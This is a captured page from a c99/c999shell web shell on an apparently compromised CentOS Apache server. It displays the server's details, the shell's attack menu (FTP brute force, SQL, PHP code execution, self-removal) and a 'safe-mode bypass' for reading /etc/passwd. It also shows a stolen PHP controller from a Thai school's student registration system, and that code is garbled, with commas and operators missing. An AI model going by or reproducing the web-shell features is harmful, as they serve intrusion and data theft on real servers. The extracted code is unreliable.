!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rpt_document.php (9.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('rg_controller.php');
class Rpt_document extends Rg_controller {
//    function __construct() {
//        parent::__construct();
//    }
//****************** check valid function ******************//
    function checkselect($str){
        if ($str == "" || $str == "0") {
            $this->form_validation->set_message('checkselect','กรุณาเลือก%s');
            return false;
        }else return true;
    }
//**************************************************//
    public function searchRptRis120() {
        $this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');
        $this->contents['rs_pp'] = $this->pp->get_options("","","","");
        $this->output($this->config->item("rg_folder")."v_searchRptRis120");
    }


    public function rptRis120() {
        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">','</div>');
        $this->form_validation->set_rules('bNo',' ','trim|required|xss_clean');
        $this->form_validation->set_rules('studentCode',' ','trim|required|is_natural_no_zero|xss_clean');
        $this->form_validation->set_rules('prsId'' ''callback_checkselect');
        $this->form_validation->set_rules('typeShow',' ','callback_checkselect');

        if($this->form_validation->run() == true) {
            $this->load->model($this->config->item("rg_folder").'mo_rg_student','std');        
            $this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
            $this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');

            $con_qu_std = array('stdCode'    => $this->input->post('studentCode'));
            $con_qu_prs = array('prsId'    => $this->input->post('prsId'));
            $this->contents['qu_std'] = $this->std->qryStdJoinPfCurGen($con_qu_std);
            $this->contents['qu_prs'] = $this->prs->qryPrsJoinPPC($con_qu_prs);
            $this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');
            $this->contents['qu_tmc'] = $this->tmc->getBetweenDateByNowDate(getNowDate());
            $this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
            $this->contents['qu_cfg'] = $this->cfg->qryCfg();
            $this->contents['qu_ac'] = $this->ac->qryAc();
            $this->contents['tmc'] = $this->tmc;
            
            $this->contents['bNo'] = $this->input->post('bNo');
            $this->contents['showStPic'] = $this->input->post('showStPic');

            if($this->input->post('typeShow') == 'W'){
                $this->load->view($this->config->item("rg_folder")."v_rptRis120Word"$this->contents);
            } else {
                $this->output_pdf($this->config->item("rg_folder")."v_rptRis120");
            }
        }else{ 
            $this->searchRptRis120();
        }
    }


    public function searchRptRis121() {
        $this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
        $this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');        

        $con_rs_cur = array('curStatus'    => 'Y');
        $ord_rs_cur = array('curName'    => '');
        $this->contents['rs_cur'] = $this->cur->get_options($con_rs_cur,$ord_rs_cur,'','');

        $this->contents['tmId'] = $this->session->userdata('tmId');
        $this->contents['acY'] = $this->session->userdata('acY');

        $this->contents['rs_ps'] = $this->pp->get_options("","","","");
        $this->output($this->config->item("rg_folder")."v_searchRptRis121");
    }


    public function rptRis121() {
        $this->contents['typeSt'] = $typeSt $this->input->post('typeSt');
        $this->contents['errMs'] = '';

        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">','</div>');
        $this->form_validation->set_rules('prsId'' ''callback_checkselect');
        $this->form_validation->set_rules('typeSt'' ''callback_checkselect');
        $this->form_validation->set_rules('typeShow'' ''trim|required|xss_clean');
        if($typeSt=='1'){
            $this->form_validation->set_rules('curId',' ','callback_checkselect');
            $this->form_validation->set_rules('acY',' ','callback_checkAcY');
        }else if($typeSt=='2'){
            $this->form_validation->set_rules('stdtCode',' ','trim|required|is_natural_no_zero|xss_clean');
        }else if($typeSt=='3'){
            $this->form_validation->set_rules('uploadfile',' ','trim|required|xss_clean');
        } 

        if($this->form_validation->run() == true) {            
            $this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
            $this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            
            $this->ac->get_by_key(TRUE);
            
            $con_prs = array('prsId'    => $this->input->post('prsId'));
            $this->prs->qryPrsJoinPPC($con_prs,'','',TRUE);
            $this->contents['prs_name'] = $this->prs->name;

            $this->contents['directorType'] = ($this->input->post('prsId')==$this->ac->acPrsIdDirector) ? '' 'รักษาการในตำแหน่ง';

            $this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            if($typeSt=='1'){
                $con_std = array('curId'    => $this->input->post('curId'), 'stdAdY' => $this->input->post('acY'), 'stdGenStatus' => 'Y');
                $ord_std = array('stdCode'    => 'ASC');
                $grp_std = array('stdCode'    => 'stdCode');
                $this->contents['rs_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);
            }else if($typeSt=='2'){
                $con_std = array('stdCode'    => $this->input->post('stdtCode'), 'stdGenStatus' => 'Y');
                $ord_std = array('stdCode'    => 'ASC');
                $grp_std = array('stdCode'    => 'stdCode');
                $this->contents['rs_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);
            }else{//$typeSt=='3'
                if($_FILES['uploadfile']['name']==""$this->contents['errMs'] = 'ยังไม่ไดเลือกแฟ้มข้อมูล';
                else{
                    $tmp preg_split('[\.]'$_FILES['uploadfile']['name']);
                    if($tmp[count($tmp)-1] != 'csv') {
                        $this->contents['errMs'] = 'แฟ้มข้อมูลมีนามสกุลไม่ตรงที่กำหนด';
                    }else{
                        $this->contents['filename'] = $_FILES['uploadfile']['tmp_name'];
                        $this->contents['std'] = $this->std;
                    }
                }
            }            

            if($this->contents['errMs'] == ''){
                if($this->input->post('typeShow') == 'W'){ 
                    $this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
                    $this->cfg->get_by_key(TRUE);
                    $this->contents['cfgSiteName'] = $this->cfg->cfgSiteName;
                    $this->contents['cfgClgAddr'] = $this->cfg->cfgClgAddr;
                    $this->contents['cfgMinistry'] = $this->cfg->cfgMinistry;                    
                    $this->load->view($this->config->item("rg_folder")."v_rptRis121Word"$this->contents);
                }else $this->output_pdf($this->config->item("rg_folder")."v_rptRis121");
            }else $this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
        }else{ 
            //$this->contents['errMs'] = 'ระบุข้อมูลไม่ครบไม่สามารถออกรายงานได้';
            //$this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
            $this->searchRptRis121();
        }
    }


    public function searchRptRis122() {        
        $this->load->model($this->config->item("rg_folder").'mo_rg_person','pp');
        
        $this->contents['rs_ps'] = $this->pp->get_options("","","","");

        $this->output($this->config->item("rg_folder")."v_searchRptRis122");
    }


    public function rptRis122() {
        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">','</div>');
        $this->form_validation->set_rules('stdtCode',' ','trim|required|is_natural_no_zero|xss_clean');
        $this->form_validation->set_rules('policeStation',' ','trim|required|xss_clean');
        $this->form_validation->set_rules('postDate',' ','trim|required|xss_clean');
        $this->form_validation->set_rules('prsId'' ''callback_checkselect');                    
        $this->form_validation->set_rules('typeShow'' ''trim|required|xss_clean');

        if($this->form_validation->run() == true) {
            $this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            $this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');            

            $con_std = array('stdCode'    => $this->input->post('stdtCode'), 'stdGenStatus' => 'Y');
            $ord_std = array('stdCode'    => 'ASC');
            $grp_std = array('stdCode'    => 'stdCode');
            $this->contents['qu_std'] = $this->std->qryStdJoinPfSdtCurGen($con_std$ord_std$grp_std);            
            
            $this->ac->get_by_key(TRUE);            
            
            $con_prs = array('prsId'    => $this->input->post('prsId'));
            $this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            $this->prs->qryPrsJoinPPC($con_prs,'','',TRUE);
            $this->contents['prs_name'] = $this->prs->name;            
            $this->contents['directorType'] = ($this->input->post('prsId')==$this->ac->acPrsIdDirector) ? '' 'รักษาการในตำแหน่ง';

            $this->contents['policeStation'] = $this->input->post('policeStation');
            $this->contents['postDate'] = $this->input->post('postDate');

            if($this->input->post('typeShow') == 'W'){ 
                $this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
                $this->cfg->get_by_key(TRUE);
                $this->contents['cfgSiteName'] = $this->cfg->cfgSiteName;
                $this->contents['cfgClgAddr'] = $this->cfg->cfgClgAddr;
                $this->contents['cfgMinistry'] = $this->cfg->cfgMinistry;
                $this->load->view($this->config->item("rg_folder")."v_rptRis122Word"$this->contents);
            }else $this->output_pdf($this->config->item("rg_folder")."v_rptRis122");
        }else{
            //$this->contents['errMs'] = 'ระบุข้อมูลไม่ครบไม่สามารถออกรายงานได้';
            //$this->output_detail($this->config->item("rg_folder")."v_rptErrorMs");
            $this->searchRptRis122();
        }        
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]--